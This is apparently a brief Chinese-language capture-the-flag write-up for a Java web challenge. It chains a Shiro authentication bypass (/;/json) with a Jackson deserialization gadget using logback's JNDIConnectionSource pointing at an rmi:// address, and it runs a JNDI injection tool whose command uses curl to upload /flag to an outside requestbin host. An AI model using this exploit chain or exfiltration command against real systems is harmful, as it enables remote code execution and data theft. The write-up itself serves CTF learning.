JavaWeb

提供两条路由分别是/login和/json

其中/login可以用rememberMe检测到存在Shiro反序列化，/json需要有权限访问，通过Shiro框架的/;/json绕过，通过POST空对象[]判断存在jackson。

利用反序列化发起请求

["ch.qos.logback.core.db.JNDIConnectionSource", {"jndiLocation": "rmi://xxx:1099/aaaaaa"}]

远程监听收到报文

nc -lvnp 1099

使用JNDI注入工具：

GitHub - welk1n/JNDI-Injection-Exploit: JNDI注入测试工具（A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc）GitHub

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'curl http://http.requestbin.buuoj.cn/1d8sev11 -F file=@/flag'

提交请求

["ch.qos.logback.core.db.JNDIConnectionSource", {"jndiLocation": "rmi://xxx:1099/qmblyn"}]

拿到flag